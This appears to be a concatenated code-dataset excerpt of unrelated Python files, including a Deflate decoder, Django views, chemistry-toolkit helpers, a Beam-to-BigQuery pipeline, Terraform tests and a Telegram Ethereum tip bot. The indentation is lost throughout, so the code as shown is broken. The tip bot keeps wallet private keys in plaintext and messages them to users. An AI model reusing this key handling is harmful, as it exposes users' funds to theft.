lits_dists = self.ReadCodeLens(codelen_huff, hlit + hdist)
lit_huff = Huffman(lits_dists[:hlit], MAXLCODES)
dist_huff = Huffman(lits_dists[hlit:], MAXDCODES)
else: # reserved
assert(False)
while True:
code = self.ReadCode(lit_huff)
if code < 256:
self.output.append(code)
print(f'>> Output ({repr(chr(code))})')
elif code == 256:
print(f'>> Stop')
break
else:
lextra = self.ReadBits(EXTRA_LENGTH_BITS[code - 257])
length = LENGTH_BASE[code - 257] + lextra
dcode = self.ReadCode(dist_huff)
dextra = self.ReadBits(EXTRA_DIST_BITS[dcode])
dist = DIST_BASE[dcode] + dextra
for i in range(length):
self.output.append(self.output[-dist])
print(f">> Ref ({dist}, {length}) = {repr(''.join(map(chr, self.output[-length:])))}")
return not bfinal
def ReadCode(self, huffman):
code = 0
first = 0
index = 0
for i in range(1, MAXBITS+1):
code |= self.ReadBits(1)
count = huffman.count[i]
if code - count < first:
sym = huffman.symbol[index + (code - first)]
# print(f'ReadCode() => {sym} ({repr(chr(sym))})')
return sym
index += count
first += count
first <<= 1
code <<= 1
raise Exception('Unknown code!')
def ReadCodeLens(self, huffman, count):
res = []
while len(res) < count:
x = self.ReadCode(huffman)
if x < 16:
res.append(x)
continue
elif x == 16:
rep_val = res[-1]
rep_cnt = 3 + self.ReadBits(2)
elif x == 17:
rep_val = 0
rep_cnt = 3 + self.ReadBits(3)
elif x == 18:
rep_val = 0
rep_cnt = 11 + self.ReadBits(7)
res += [rep_val] * rep_cnt
return res
def main(args):
parser = argparse.ArgumentParser()
parser.add_argument('file')
args = parser.parse_args(args)
inflater = Inflater(open(args.file, 'rb').read())
output = ''.join(map(chr, inflater.Inflate()))
# print('output', output)
# print('len', len(output))
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
``` |
{
"source": "00FFEF/Team_Project",
"score": 2
} |
#### File: Team_Project/home/views.py
```python
import json
from django.shortcuts import render
from django.http import HttpResponse
from templates.MyAnalysis import MyAnalysis
import sqlite3
import pandas as pd
# Create your views here.
def main(request):
return render(request, 'index.html')
def scrapping_index(request):
return render(request,'scrapping_index.html')
def machine_index(request):
result = dict()
conn = sqlite3.connect('db.sqlite3')
conn.row_factory = sqlite3.Row # for getting columns
curs = conn.cursor()
curs.execute('select * from dbapp_admachine da')
data = curs.fetchall()
for row in data:
print(row['Age'])
print(row['EstimatedSalary'])
print(row['Gender'])
print(row['Purchased'])
print(row['UserID'])
print(row['id'])
result['erows'] = data
return render(request,'machine_index.html',result)
def service_index(request):
return render(request,'service_index.html')
def kakao_chart(request):
data = MyAnalysis().kakaoo()
return HttpResponse(json.dumps(data), content_type='application/json')
def naver_chart(request):
data = MyAnalysis().never()
return HttpResponse(json.dumps(data), content_type='application/json')
def ad(request):
conn = sqlite3.connect("../db.sqlite3")
df = pd.read_sql_query('select * from dbapp_admachine da', conn)
age = df['Age']
sal = df['EstimatedSalary']
gen = df['Gender']
pur = df['Purchased']
uid = df['UserID']
result = {'Age' : age, 'Estimated Salary' : sal, 'Gender' : gen, 'Purchased' : pur, 'User ID' : uid}
return render(request, 'machine_index.html', context=result)
``` |
{
"source": "00Green27/Indigo",
"score": 2
} |
#### File: bingo_elastic/model/helpers.py
```python
from pathlib import Path
from typing import Callable, Generator, Optional, Union
from indigo import Indigo, IndigoObject
from bingo_elastic.model.record import IndigoRecord
def iterate_file(
file: Path,
iterator: str = None,
error_handler: Optional[Callable[[object, BaseException], None]] = None,
) -> Generator[IndigoRecord, None, None]:
"""
:param file:
:param iterator: supported iterators: sdf, smiles, smi, cml.
If iterator is not set, it is determined
from the file extension
:type iterator: str
:param error_handler: lambda for catching exceptions
:type error_handler: Optional[Callable[[object, BaseException], None]]
:return:
"""
iterators = {
"sdf": "iterateSDFile",
"smiles": "iterateSmilesFile",
"smi": "iterateSmilesFile",
"cml": "iterateCMLFile",
}
if not iterator:
iterator = file.suffix[1:]
iterator_fn = iterators.get(iterator)
if not iterator_fn:
raise AttributeError(f"Unsupported iterator {iterator}")
indigo_object: IndigoObject
for indigo_object in getattr(Indigo(), iterator_fn)(str(file)):
yield IndigoRecord(
indigo_object=indigo_object, error_handler=error_handler
)
def iterate_sdf(
file: Union[Path, str],
error_handler: Optional[Callable[[object, BaseException], None]] = None,
) -> Generator:
yield from iterate_file(
Path(file) if isinstance(file, str) else file,
"sdf",
error_handler=error_handler,
)
def iterate_smiles(
file: Union[Path, str],
error_handler: Optional[Callable[[object, BaseException], None]] = None,
) -> Generator:
yield from iterate_file(
Path(file) if isinstance(file, str) else file,
"smiles",
error_handler=error_handler,
)
def iterate_cml(
file: Union[Path, str],
error_handler: Optional[Callable[[object, BaseException], None]] = None,
) -> Generator:
yield from iterate_file(
Path(file) if isinstance(file, str) else file,
"cml",
error_handler=error_handler,
)
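# Hedged usage sketch (not part of the original module); "molecules.sdf" is a
# hypothetical input file, and parse errors are printed by the handler instead of
# aborting the iteration.
def _example_count_sdf_records(path: str = "molecules.sdf") -> int:
    count = 0
    for _record in iterate_sdf(path, error_handler=lambda entry, exc: print(exc)):
        count += 1
    return count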
```
#### File: tests/model/test_helpers.py
```python
from pathlib import Path
from typing import Callable
import bingo_elastic.model.helpers as helpers
def test_iterate_sdf(resource_loader: Callable[[str], str]):
results = []
for step in range(0, 2):
if 0 == step:
sdf = helpers.iterate_sdf(
resource_loader("resources/rand_queries_small.sdf")
)
else:
sdf = helpers.iterate_file(
Path(resource_loader("resources/rand_queries_small.sdf"))
)
i = 0
for i, _ in enumerate(sdf, start=1):
pass
results.append(i)
assert results[0] == results[1]
def test_iterate_smiles(resource_loader: Callable[[str], str]):
results = []
for step in range(0, 2):
if 0 == step:
smiles = helpers.iterate_smiles(
resource_loader("resources/pubchem_slice_50.smi")
)
else:
smiles = helpers.iterate_file(
Path(resource_loader("resources/pubchem_slice_50.smi"))
)
i = 0
for i, _ in enumerate(smiles, start=1):
pass
results.append(i)
assert results[0] == results[1]
def test_iterate_cml(resource_loader: Callable[[str], str]):
results = []
for step in range(0, 2):
if 0 == step:
cml = helpers.iterate_cml(
resource_loader("resources/tetrahedral-all.cml")
)
else:
cml = helpers.iterate_file(
Path(resource_loader("resources/tetrahedral-all.cml"))
)
i = 0
for i, _ in enumerate(cml, start=1):
pass
results.append(i)
assert results[0] == results[1]
```
#### File: python/common/indigo_coverage.py
```python
import sys
import os
from inspect import getmembers
from types import BuiltinFunctionType, BuiltinMethodType, MethodType, FunctionType
import zipfile
from util import isIronPython, isJython, getPlatform
cur_path = os.path.abspath(os.path.dirname(__file__))
distPaths = [os.path.join(cur_path, '../../../indigo/dist'), os.path.join(cur_path, '../../dist/')]
success = False
if isIronPython():
raise RuntimeError("Indigo coverage is not supported in .NET")
elif isJython():
raise RuntimeError("Indigo coverage is not supported in Java")
else:
dll_full_path = os.path.normpath(os.path.join(cur_path, "../../../indigo/api/python"))
rdll_full_path = os.path.normpath(os.path.join(cur_path, "../../../indigo/api/plugins/renderer/python"))
idll_full_path = os.path.normpath(os.path.join(cur_path, "../../../indigo/api/plugins/inchi/python"))
bdll_full_path = os.path.normpath(os.path.join(cur_path, "../../../indigo/api/plugins/bingo/python"))
if not os.path.exists(os.path.join(dll_full_path, 'lib')):
for distPath in distPaths:
if not os.path.exists(distPath):
continue
dll_full_path = '%s/python' % (distPath)
for item in os.listdir(distPath):
if item.startswith('indigo-python-') and item.endswith('.zip') and (item.find(getPlatform()) != -1 or item.find('universal') != -1):
curdir = os.path.abspath(os.curdir)
os.chdir(distPath)
if 'INDIGO_TEST_MODE' not in os.environ:
with zipfile.ZipFile(item) as zf:
zf.extractall()
os.environ['INDIGO_TEST_MODE'] = '1'
os.chdir(curdir)
dll_full_path = os.path.abspath(os.path.join(cur_path, distPath, item.replace('.zip', '')))
break
if not os.path.exists(dll_full_path):
continue
break
sys.path.insert(0, dll_full_path)
sys.path.insert(0, rdll_full_path)
sys.path.insert(0, idll_full_path)
sys.path.insert(0, bdll_full_path)
from indigo import Indigo, IndigoObject, IndigoException
from indigo_renderer import IndigoRenderer
from indigo_inchi import IndigoInchi
from bingo import Bingo, BingoException, BingoObject
success = True
if not success:
raise RuntimeError('Indigo not found at %s' % distPaths)
class IndigoObjectCoverageWrapper(IndigoObject):
def __init__(self, dispatcher, id, parent=None):
IndigoObject.__init__(self, dispatcher, id, parent)
self._type = None
self._type = int(self.dbgInternalType()[1:3])
def __getattribute__(self, item):
dispatcher = object.__getattribute__(self, 'dispatcher')
type = object.__getattribute__(self, '_type')
if dispatcher is not None:
if item in dispatcher._indigoObjectCoverageDict:
dispatcher._indigoObjectCoverageDict[item] += 1
if type:
if type not in dispatcher._indigoObjectCoverageByTypeDict:
dispatcher._indigoObjectCoverageByTypeDict[type] = {}
dispatcher._indigoObjectCoverageByTypeDict[type][item] = 1
else:
if item not in dispatcher._indigoObjectCoverageByTypeDict[type]:
dispatcher._indigoObjectCoverageByTypeDict[type][item] = 1
else:
dispatcher._indigoObjectCoverageByTypeDict[type][item] += 1
return object.__getattribute__(self, item)
class IndigoCoverageWrapper(Indigo):
def __init__(self, path=None):
Indigo.__init__(self, path)
if isJython() or isIronPython():
IndigoObject = IndigoObjectCoverageWrapper
# TODO: Change standard IndigoObject to IndigoObjectCoverageWrapper
else:
self.IndigoObject = IndigoObjectCoverageWrapper
self._indigoObjectCoverageDict = dict()
self._indigoObjectCoverageByTypeDict = dict()
m = self.createMolecule()
for item in getmembers(m):
if type(item[1]) in (BuiltinFunctionType, BuiltinMethodType, MethodType, FunctionType) and not item[0].startswith('_'):
self._indigoObjectCoverageDict[item[0]] = 0
self._indigoCoverageDict = dict()
for item in getmembers(self):
if type(item[1]) in (BuiltinFunctionType, BuiltinMethodType, MethodType, FunctionType) and not item[0].startswith('_'):
self._indigoCoverageDict[item[0]] = 0
def __getattribute__(self, item):
try:
indigoCoverageDict = object.__getattribute__(self, '_indigoCoverageDict')
if indigoCoverageDict:
if item in indigoCoverageDict:
indigoCoverageDict[item] += 1
except AttributeError:
pass
return object.__getattribute__(self, item)
def version(self):
return super(IndigoCoverageWrapper, self).version() + '-coverage'
class IndigoObjectTypeEnum:
SCANNER = 1
MOLECULE = 2
QUERY_MOLECULE = 3
REACTION = 4
QUERY_REACTION = 5
OUTPUT = 6
REACTION_ITER = 7
REACTION_MOLECULE = 8
GROSS = 9
SDF_LOADER = 10
SDF_SAVER = 11
RDF_MOLECULE = 12
RDF_REACTION = 13
RDF_LOADER = 14
SMILES_MOLECULE = 15
SMILES_REACTION = 16
MULTILINE_SMILES_LOADER = 17
ATOM = 18
ATOMS_ITER = 19
RGROUP = 20
RGROUPS_ITER = 21
RGROUP_FRAGMENT = 22
RGROUP_FRAGMENTS_ITER = 23
ARRAY = 24
ARRAY_ITER = 25
ARRAY_ELEMENT = 26
MOLECULE_SUBSTRUCTURE_MATCH_ITER = 27
MOLECULE_SUBSTRUCTURE_MATCHER = 28
REACTION_SUBSTRUCTURE_MATCHER = 29
SCAFFOLD = 30
DECONVOLUTION = 31
DECONVOLUTION_ELEM = 32
DECONVOLUTION_ITER = 33
PROPERTIES_ITER = 34
PROPERTY = 35
FINGERPRINT = 36
BOND = 37
BONDS_ITER = 38
ATOM_NEIGHBOR = 39
ATOM_NEIGHBORS_ITER = 40
SUPERATOM = 41
SUPERATOMS_ITER = 42
DATA_SGROUP = 43
DATA_SGROUPS_ITER = 44
REPEATING_UNIT = 45
REPEATING_UNITS_ITER = 46
MULTIPLE_GROUP = 47
MULTIPLE_GROUPS_ITER = 48
GENERIC_SGROUP = 49
GENERIC_SGROUPS_ITER = 50
SGROUP_ATOMS_ITER = 51
SGROUP_BONDS_ITER = 52
DECOMPOSITION = 53
COMPONENT = 54
COMPONENTS_ITER = 55
COMPONENT_ATOMS_ITER = 56
COMPONENT_BONDS_ITER = 57
SUBMOLECULE = 58
SUBMOLECULE_ATOMS_ITER = 59
SUBMOLECULE_BONDS_ITER = 60
MAPPING = 61
REACTION_MAPPING = 62
SSSR_ITER = 63
SUBTREES_ITER = 64
RINGS_ITER = 65
EDGE_SUBMOLECULE_ITER = 66
CML_MOLECULE = 67
CML_REACTION = 68
MULTIPLE_CML_LOADER = 69
SAVER = 70
ATTACHMENT_POINTS_ITER = 71
DECOMPOSITION_MATCH = 72
DECOMPOSITION_MATCH_ITER = 73
TAUTOMER_ITER = 74
TAUTOMER_MOLECULE = 75
IndigoObjectTypeDict = {
1: 'SCANNER',
2: 'MOLECULE',
3: 'QUERY_MOLECULE',
4: 'REACTION',
5: 'QUERY_REACTION',
6: 'OUTPUT',
7: 'REACTION_ITER',
8: 'REACTION_MOLECULE',
9: 'GROSS',
10: 'SDF_LOADER',
11: 'SDF_SAVER',
12: 'RDF_MOLECULE',
13: 'RDF_REACTION',
14: 'RDF_LOADER',
15: 'SMILES_MOLECULE',
16: 'SMILES_REACTION',
17: 'MULTILINE_SMILES_LOADER',
18: 'ATOM',
19: 'ATOMS_ITER',
20: 'RGROUP',
21: 'RGROUPS_ITER',
22: 'RGROUP_FRAGMENT',
23: 'RGROUP_FRAGMENTS_ITER',
24: 'ARRAY',
25: 'ARRAY_ITER',
26: 'ARRAY_ELEMENT',
27: 'MOLECULE_SUBSTRUCTURE_MATCH_ITER',
28: 'MOLECULE_SUBSTRUCTURE_MATCHER',
29: 'REACTION_SUBSTRUCTURE_MATCHER',
30: 'SCAFFOLD',
31: 'DECONVOLUTION',
32: 'DECONVOLUTION_ELEM',
33: 'DECONVOLUTION_ITER',
34: 'PROPERTIES_ITER',
35: 'PROPERTY',
36: 'FINGERPRINT',
37: 'BOND',
38: 'BONDS_ITER',
39: 'ATOM_NEIGHBOR',
40: 'ATOM_NEIGHBORS_ITER',
41: 'SUPERATOM',
42: 'SUPERATOMS_ITER',
43: 'DATA_SGROUP',
44: 'DATA_SGROUPS_ITER',
45: 'REPEATING_UNIT',
46: 'REPEATING_UNITS_ITER',
47: 'MULTIPLE_GROUP',
48: 'MULTIPLE_GROUPS_ITER',
49: 'GENERIC_SGROUP',
50: 'GENERIC_SGROUPS_ITER',
51: 'SGROUP_ATOMS_ITER',
52: 'SGROUP_BONDS_ITER',
53: 'DECOMPOSITION',
54: 'COMPONENT',
55: 'COMPONENTS_ITER',
56: 'COMPONENT_ATOMS_ITER',
57: 'COMPONENT_BONDS_ITER',
58: 'SUBMOLECULE',
59: 'SUBMOLECULE_ATOMS_ITER',
60: 'SUBMOLECULE_BONDS_ITER',
61: 'MAPPING',
62: 'REACTION_MAPPING',
63: 'SSSR_ITER',
64: 'SUBTREES_ITER',
65: 'RINGS_ITER',
66: 'EDGE_SUBMOLECULE_ITER',
67: 'CML_MOLECULE',
68: 'CML_REACTION',
69: 'MULTIPLE_CML_LOADER',
70: 'SAVER',
71: 'ATTACHMENT_POINTS_ITER',
72: 'DECOMPOSITION_MATCH',
73: 'DECOMPOSITION_MATCH_ITER',
74: 'TAUTOMER_ITER',
75: 'TAUTOMER_MOLECULE',
}
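# Hedged usage sketch (not part of the original module): use the wrapper in place of
# Indigo and read back the per-method call counters it accumulates.
# indigo = IndigoCoverageWrapper()
# indigo.createMolecule()
# print(indigo._indigoCoverageDict['createMolecule'])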
```
#### File: python/common/thread_printer.py
```python
from __future__ import with_statement
import sys
if sys.version_info < (3, 0):
from cStringIO import StringIO
else:
from io import StringIO
import inspect
import os
class ThreadPrinter(object):
def __init__(self, lock):
self.fhs = {}
self.lock = lock
def write(self, value):
with self.lock:
frm = inspect.stack()[1][1]
splittedFromPath = frm.split(os.path.sep)
test_group = splittedFromPath[-2]
test = splittedFromPath[-1]
curTestName = '%s/%s' % (test_group, test)
if curTestName in self.fhs:
f = self.fhs[curTestName]
else:
f = StringIO()
f.write(value)
self.fhs[curTestName] = f
def getValueByTestName(self, testName):
result = ''
for key, value in self.fhs.items():
key = key.replace('_modified', '')
if key == testName:
result = value.getvalue()
return result
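# Hedged usage sketch (assumption, not in the original module): ThreadPrinter is meant
# to replace sys.stdout so that concurrent test output is bucketed per "group/test" file.
# import threading
# sys.stdout = ThreadPrinter(threading.Lock())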
```
#### File: indigo-service/service/app.py
```python
import logging
import sys
from flask import Flask, jsonify, Blueprint
from flasgger import Swagger
from optparse import OptionParser
from werkzeug.serving import run_simple
from v2.libraries_api import libraries_api
from v2.indigo_api import indigo_api, indigo_init
from v2.db.database import db_session
from v2.imago_api import imago_api
from v2.common_api import common_api
def is_indigo_db():
try:
import socket
socket.gethostbyname('indigo_db')
return True
except:
return False
app = Flask(__name__)
app.config.from_pyfile('config.py')
if is_indigo_db():
app.register_blueprint(libraries_api, url_prefix='/v2/libraries')
app.register_blueprint(indigo_api, url_prefix='/v2/indigo')
app.register_blueprint(imago_api, url_prefix='/v2/imago')
app.register_blueprint(common_api,url_prefix='/v2')
Swagger(app)
# logging.basicConfig(, level=logging.INFO)
logging.basicConfig(stream=sys.stdout, format = u'[%(asctime)s: %(levelname)-8s/%(filename)s:%(lineno)d] %(message)s', level = app.config.get('LOG_LEVEL'))
def run_server(port):
run_simple('0.0.0.0', port, app, use_reloader=True, use_debugger=True, use_evalex=True)
@app.teardown_appcontext
def shutdown_session(exception=None):
db_session.remove()
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("-s", "--server", action="store_true", dest="run_server", default=False, help="Run local server")
parser.add_option("-p", "--port", action="store", dest="port", type="int", default=5000, help="Specify port")
(options, args) = parser.parse_args()
if options.run_server:
run_server(options.port)
``` |
{
"source": "00inboxtest/cloud-foundation-fabric",
"score": 3
} |
#### File: scripts/data_ingestion/data_ingestion.py
```python
import argparse
import logging
import re
import apache_beam as beam
from apache_beam.options.pipeline_options import PipelineOptions
class DataIngestion:
"""A helper class which contains the logic to translate the file into
a format BigQuery will accept."""
def parse_method(self, string_input):
"""Translate CSV row to dictionary.
Args:
string_input: A comma separated list of values in the form of
name,surname
Example string_input: lorenzo,caggioni
Returns:
A dict mapping BigQuery column names as keys
example output:
{
'name': 'mario',
'surname': 'rossi',
'age': 30
}
"""
# Strip out carriage return, newline and quote characters.
values = re.split(",", re.sub('\r\n', '', re.sub('"', '',
string_input)))
row = dict(
zip(('name', 'surname', 'age'),
values))
return row
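# Worked example (illustrative): DataIngestion().parse_method('mario,rossi,30') returns
# {'name': 'mario', 'surname': 'rossi', 'age': '30'}; every value is still a string at
# this point, and BigQuery coerces 'age' to NUMERIC when the row is written with the
# schema declared in run() below.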
class InjectTimestamp(beam.DoFn):
"""A class which add a timestamp for each row.
Args:
element: A dictionary mapping BigQuery column names
Example:
{
'name': 'mario',
'surname': 'rossi',
'age': 30
}
Returns:
The input dictionary with a timestamp value added
Example:
{
'name': 'mario',
'surname': 'rossi',
'age': 30
'_TIMESTAMP': 1545730073
}
"""
def process(self, element):
import time
element['_TIMESTAMP'] = int(time.mktime(time.gmtime()))
return [element]
def run(argv=None):
"""The main function which creates the pipeline and runs it."""
parser = argparse.ArgumentParser()
parser.add_argument(
'--input',
dest='input',
required=False,
help='Input file to read. This can be a local file or '
'a file in a Google Storage Bucket.')
parser.add_argument(
'--output',
dest='output',
required=False,
help='Output BQ table to write results to.')
# Parse arguments from the command line.
known_args, pipeline_args = parser.parse_known_args(argv)
# DataIngestion is a class we built in this script to hold the logic for
# transforming the file into a BigQuery table.
data_ingestion = DataIngestion()
# Initiate the pipeline using the pipeline arguments
p = beam.Pipeline(options=PipelineOptions(pipeline_args))
(p
# Read the file. This is the source of the pipeline.
| 'Read from a File' >> beam.io.ReadFromText(known_args.input)
# Translates CSV row to a dictionary object consumable by BigQuery.
| 'String To BigQuery Row' >>
beam.Map(lambda s: data_ingestion.parse_method(s))
# Add the timestamp on each row
| 'Inject Timestamp - ' >> beam.ParDo(InjectTimestamp())
# Write data to Bigquery
| 'Write to BigQuery' >> beam.io.Write(
beam.io.BigQuerySink(
# BigQuery table name.
known_args.output,
# Bigquery table schema
schema='name:STRING,surname:STRING,age:NUMERIC,_TIMESTAMP:TIMESTAMP',
# Never create the table automatically; it must already exist in BigQuery.
create_disposition=beam.io.BigQueryDisposition.CREATE_NEVER,
# Deletes all data in the BigQuery table before writing.
write_disposition=beam.io.BigQueryDisposition.WRITE_TRUNCATE)))
p.run().wait_until_finish()
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
run()
```
#### File: modules/compute_mig/test_plan.py
```python
import os
import pytest
FIXTURES_DIR = os.path.join(os.path.dirname(__file__), 'fixture')
def test_defaults(plan_runner):
"Test variable defaults."
_, resources = plan_runner(FIXTURES_DIR)
assert len(resources) == 1
print(resources[0]['type'])
mig = resources[0]
assert mig['type'] == 'google_compute_instance_group_manager'
assert mig['values']['target_size'] == 2
assert mig['values']['zone']
_, resources = plan_runner(FIXTURES_DIR, regional='true')
assert len(resources) == 1
mig = resources[0]
assert mig['type'] == 'google_compute_region_instance_group_manager'
assert mig['values']['target_size'] == 2
assert mig['values']['region']
def test_health_check(plan_runner):
"Test health check resource."
health_check_config = '{type="tcp", check={port=80}, config=null, logging=false}'
_, resources = plan_runner(
FIXTURES_DIR, health_check_config=health_check_config)
assert len(resources) == 2
assert any(r['type'] == 'google_compute_health_check' for r in resources)
def test_autoscaler(plan_runner):
"Test autoscaler resource."
autoscaler_config = (
'{'
'max_replicas=3, min_replicas=1, cooldown_period=60,'
'cpu_utilization_target=65, load_balancing_utilization_target=null,'
'metric=null'
'}'
)
_, resources = plan_runner(
FIXTURES_DIR, autoscaler_config=autoscaler_config)
assert len(resources) == 2
autoscaler = resources[0]
assert autoscaler['type'] == 'google_compute_autoscaler'
assert autoscaler['values']['autoscaling_policy'] == [{
'cooldown_period': 60,
'cpu_utilization': [{'predictive_method': 'NONE', 'target': 65}],
'load_balancing_utilization': [],
'max_replicas': 3,
'metric': [],
'min_replicas': 1,
'mode': 'ON',
'scale_in_control': [],
'scaling_schedules': [],
}]
_, resources = plan_runner(
FIXTURES_DIR, autoscaler_config=autoscaler_config, regional='true')
assert len(resources) == 2
autoscaler = resources[0]
assert autoscaler['type'] == 'google_compute_region_autoscaler'
def test_stateful_mig(plan_runner):
"Test stateful instances - mig."
stateful_config = (
'{'
'per_instance_config = {},'
'mig_config = {'
'stateful_disks = {'
'persistent-disk-1 = {delete_rule="NEVER"}'
'}'
'}'
'}'
)
_, resources = plan_runner(
FIXTURES_DIR, stateful_config=stateful_config)
assert len(resources) == 1
statefuldisk = resources[0]
assert statefuldisk['type'] == 'google_compute_instance_group_manager'
assert statefuldisk['values']['stateful_disk'] == [{
'device_name': 'persistent-disk-1',
'delete_rule': 'NEVER',
}]
def test_stateful_instance(plan_runner):
"Test stateful instances - instance."
stateful_config = (
'{'
'per_instance_config = {'
'instance-1 = {'
'stateful_disks = {'
'persistent-disk-1 = {'
'source = "test-disk",'
'mode = "READ_ONLY",'
'delete_rule= "NEVER",'
'},'
'},'
'metadata = {'
'foo = "bar"'
'},'
'update_config = {'
'minimal_action = "NONE",'
'most_disruptive_allowed_action = "REPLACE",'
'remove_instance_state_on_destroy = false,'
'},'
'},'
'},'
'mig_config = {'
'stateful_disks = {'
'persistent-disk-1 = {delete_rule="NEVER"}'
'}'
'}'
'}'
)
_, resources = plan_runner(
FIXTURES_DIR, stateful_config=stateful_config)
assert len(resources) == 2
instanceconfig = resources[0]
assert instanceconfig['type'] == 'google_compute_instance_group_manager'
instanceconfig = resources[1]
assert instanceconfig['type'] == 'google_compute_per_instance_config'
assert instanceconfig['values']['preserved_state'] == [{
'disk': [{
'device_name': 'persistent-disk-1',
'delete_rule': 'NEVER',
'source': 'test-disk',
'mode': 'READ_ONLY',
}],
'metadata': {
'foo': 'bar'
}
}]
assert instanceconfig['values']['minimal_action'] == 'NONE'
assert instanceconfig['values']['most_disruptive_allowed_action'] == 'REPLACE'
assert instanceconfig['values']['remove_instance_state_on_destroy'] == False
```
#### File: modules/iam_service_account/test_plan.py
```python
import os
import pytest
FIXTURES_DIR = os.path.join(os.path.dirname(__file__), 'fixture')
def test_resources(plan_runner):
"Test service account resource."
_, resources = plan_runner(FIXTURES_DIR)
assert len(resources) == 1
resource = resources[0]
assert resource['type'] == 'google_service_account'
assert resource['values']['account_id'] == 'sa-one'
_, resources = plan_runner(FIXTURES_DIR, prefix='foo')
assert len(resources) == 1
resource = resources[0]
assert resource['values']['account_id'] == 'foo-sa-one'
def test_iam_roles(plan_runner):
"Test iam roles with one member."
iam = ('{"roles/iam.serviceAccountUser" = ["user:<EMAIL>"]}')
_, resources = plan_runner(FIXTURES_DIR, iam=iam)
assert len(resources) == 2
iam_resources = [r for r in resources
if r['type'] != 'google_service_account']
assert len(iam_resources) == 1
iam_resource = iam_resources[0]
assert iam_resource['type'] == 'google_service_account_iam_binding'
assert iam_resource['index'] == 'roles/iam.serviceAccountUser'
assert iam_resource['values']['role'] == 'roles/iam.serviceAccountUser'
assert iam_resource['values']['members'] == ["user:<EMAIL>"]
```
#### File: modules/vpc_sc/test_plan.py
```python
import os
FIXTURES_DIR = os.path.join(os.path.dirname(__file__), 'fixture')
def test_create_policy(plan_runner):
"Test with auto-created policy."
_, resources = plan_runner(FIXTURES_DIR)
counts = {}
for r in resources:
n = f'{r["type"]}.{r["name"]}'
counts[n] = counts.get(n, 0) + 1
assert counts == {
'google_access_context_manager_access_level.basic': 2,
'google_access_context_manager_access_policy.default': 1,
'google_access_context_manager_service_perimeter.bridge': 2,
'google_access_context_manager_service_perimeter.regular': 2
}
def test_use_policy(plan_runner):
"Test with existing policy."
_, resources = plan_runner(FIXTURES_DIR, access_policy_create="null",
access_policy="accessPolicies/foobar")
counts = {}
for r in resources:
n = f'{r["type"]}.{r["name"]}'
counts[n] = counts.get(n, 0) + 1
assert counts == {
'google_access_context_manager_access_level.basic': 2,
'google_access_context_manager_service_perimeter.bridge': 2,
'google_access_context_manager_service_perimeter.regular': 2
}
``` |
{
"source": "00jw/Tip-bot",
"score": 2
} |
#### File: 00jw/Tip-bot/tip_bot.py
```python
import json
import traceback
from random import randint
from pymongo import MongoClient
from telegram import Bot
from web3 import Web3, HTTPProvider
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--config", type=str, required=True, help="Config file")
parser.add_argument("-t", "--toothless", help="Does not send transactions", action="store_true")
parser.add_argument("-v", "--verbose", help="A more verbose output", action="store_true")
options = parser.parse_args()
with open(options.config) as conf_file:
conf = json.load(conf_file)
connectionString = conf['mongo']['connectionString'] + "/" + conf['mongo']['db']
http_provider = conf['web3']['provider']
bot_token = conf['telegram_bot']['bot_token']
dictionary = conf['dictionary']
donate_address = conf['donate_address']
class TipBot:
def __init__(self, w3):
if options.toothless:
print("Running toothless. Transactions will not be sent")
self.w3 = w3
print("Web3 Connected: %s " % self.w3.isConnected())
# Telegram bot initialization
self.bot = Bot(bot_token)
# Tip bot Initialization
client = MongoClient(connectionString)
db = client.get_database()
self.col_users = db['Users']
# get chat updates
self.new_message = self.wait_new_message()
self.message = self.new_message.message \
if self.new_message.message is not None \
else self.new_message.callback_query.message
self.text, _is_document = self.get_action(self.new_message)
self.message_text = str(self.text).lower()
print(self.text)
# init user data
try:
self.first_name = self.new_message.effective_user.first_name
self.username = self.new_message.effective_user.username
self.user_id = self.new_message.effective_user.id
except Exception as exc:
print(exc)
self.chat_id = self.message.chat.id
self.address = self.get_user_address()
split = self.message_text.split(' ')
if len(split) > 1:
args = split[1:]
else:
args = None
self.check_username_on_change()
self.action_processing(split[0], args)
"""
Get group username
"""
def get_group_username(self):
try:
return str(self.message.chat.username)
except:
return str(self.message.chat.id)
"""
Get User username
"""
def get_user_username(self):
try:
return str(self.message.from_user.username)
except:
if options.verbose:
print("Could not find username for:")
print(self.message)
return None
def wait_new_message(self):
while True:
updates = self.bot.get_updates()
if len(updates) > 0:
break
update = updates[0]
self.bot.get_updates(offset=update["update_id"] + 1)
return update
"""
Get user action | msg or callback
"""
@staticmethod
def get_action(message):
_is_document = False
if message['message'] is not None:
menu_option = message['message']['text']
_is_document = message['message']['document'] is not None
elif message["callback_query"] != 0:
menu_option = message["callback_query"]["data"]
return str(menu_option), _is_document
"""
Handle user actions
"""
def action_processing(self, cmd, args):
if "/start" == cmd:
_is_user_exists = self.col_users.find_one({"_id": self.user_id}) is not None
if not _is_user_exists:
public_key, pr_key = self.create_user_wallet()
self.col_users.insert({
"_id": self.user_id,
"UserName": self.username,
"Address": public_key,
"PrivateKey": pr_key,
"Balance": 0
})
self.bot.send_message(
self.user_id,
dictionary['welcome'] % public_key,
parse_mode='HTML'
)
elif "/tip" == cmd or "/send" == cmd:
if args is not None and len(args) >= 1:
if options.verbose:
print("self.message:")
print(self.message)
if self.message.reply_to_message is not None:
if options.verbose:
print("running tip_in_the_chat() with args:")
print(*args)
self.tip_in_the_chat(*args)
else:
if options.verbose:
print("running tip_user() with args:")
print(*args)
self.tip_user(*args)
else:
self.bot.send_message(self.user_id,
dictionary['incorrect_parameters'],
parse_mode='HTML')
elif "/balance" == cmd:
balance = self.check_balance()
self.bot.send_message(
self.user_id,
dictionary['balance'] % balance,
parse_mode='HTML'
)
elif "/withdraw" == cmd:
try:
if args is not None and len(args) == 2:
self.withdraw_coins(*args)
else:
self.bot.send_message(
self.user_id,
dictionary['incorrect_withdraw'],
parse_mode='HTML'
)
except Exception as exc:
print(exc)
elif "/deposit" == cmd:
self.bot.send_message(
self.user_id,
dictionary['deposit'] % self.address,
parse_mode='HTML'
)
elif "/donate" == cmd:
if args is not None and len(args) == 1:
self.donate(*args)
else:
self.bot.send_message(
self.user_id,
dictionary['donate'],
parse_mode='HTML'
)
elif "/help" == cmd:
self.bot.send_message(
self.user_id,
dictionary['help'],
parse_mode='HTML'
)
elif "/backup" == cmd:
_private_key = self.col_users.find_one({"_id": self.user_id})['PrivateKey']
self.bot.send_message(
self.user_id,
dictionary['backup'] % _private_key,
parse_mode='HTML'
)
"""
